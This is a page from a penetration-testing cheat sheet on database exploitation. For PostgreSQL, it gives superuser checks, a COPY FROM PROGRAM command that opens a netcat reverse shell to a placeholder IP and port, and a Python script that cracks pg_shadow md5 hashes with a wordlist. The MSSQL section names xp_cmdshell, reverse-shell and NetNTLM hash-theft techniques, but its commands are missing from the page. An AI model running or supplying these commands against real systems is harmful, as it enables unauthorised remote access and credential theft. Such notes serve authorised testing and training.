Database Explotation

PostgreSQL Command Execution

Using COPY TO/FROM PROGRAM

Installations running Postgres 9.3 and above have functionality which allows for the superuser and users with 'pg_execute_server_program' to pipe to and from an external program using COPY.

Check if the user is superuser

SHOW is_superuser; 
SELECT current_setting('is_superuser');
SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
CREATE TABLE shell(output text);
COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f';

PostgreSQL Cracking (md5 password + username)

The hashes from pg_shadow uses that format -> md5(password + username)

If we are not able to crack the md5 hash of postgres we can use this script.

import hashlib

target_hash = "md5ae8c67affdb169a42c9631c02fc67ede"
username = "rubben"

with open("/usr/share/wordlists/rockyou.txt", "r", encoding="latin-1") as f:
    for line in f:
        password = line.strip()
        combo = password + username
        hashed = "md5" + hashlib.md5(combo.encode()).hexdigest()
        if hashed == target_hash:
            print(f"[+] Password found: {password}")
            break

MSSQL

Check privileges

Enable xp_cmdshell (With privileges)

For establishing reverse shell (rev.ps1 is nishang shell):

Other Method

**Steal NetNTLM Hash / Relay Attack (**Without privileges)

Though we can’t execute commands using xp_cmdshell we can steal hashes of the SQL service account by using xp_dirtree or xp_fileexist.

And with the smbserver grab the hash:

Enable xp_cmdshell via SQL Injection

PreviousHash CrackingNextClient-Side Attacks

Last updated